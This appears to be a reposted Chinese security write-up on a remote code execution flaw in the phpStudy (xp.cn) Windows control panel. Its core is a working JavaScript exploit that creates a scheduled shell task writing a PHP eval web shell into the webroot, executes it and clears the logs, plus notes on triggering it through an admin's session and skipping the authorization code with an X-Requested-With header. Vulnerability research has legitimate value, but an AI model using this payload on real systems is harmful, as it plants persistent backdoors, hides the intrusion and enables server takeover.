https://www.xp.cn/wenda/34721.html
傻瓜式安装
获取登录信息和重置登陆密码
functionpoc(){$.get('/service/app/tasks.php?type=task_list',{},function(data){varid=data.data[0].ID;$.post('/service/app/tasks.php?type=exec_task',{tid:id},function(res2){$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");}functionsave(){vardata=newObject();data.task_id="";data.title="test";data.exec_cycle="1";data.week="1";data.day="3";data.hour="14";data.minute="20";data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');}save();
插入即可
用admin登录 在计划任务处
现在我们来分析一下 刚刚复现过程中请求的路径 直接定位serviceappaccount.php
我们这里跟进Account::login($username,$pwd,$verifycode);
可以看到22行 这里进行了Socket::request调用和8090进行通信。
所以如果挖到ssrf即可 无条件rce,可以从非php端入手去挖掘。
好了,这里我们还要解决一个问题。在不清楚授权码的情况下如何进行攻击呢。
因为这是Workerman 所以我们直接看看 手册 然后再运行的时候调用这个进行消息回调
所以我们只要传入Header 为X-Requested-With: XMLHttpRequest 即可不需要授权码,如下图所示。
所以我们现在只需要写一个远程的js 然后管理员 登陆上去即可等待上线。
原文始发于微信公众号(Timeline Sec):phpStudy小皮Windows面板RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论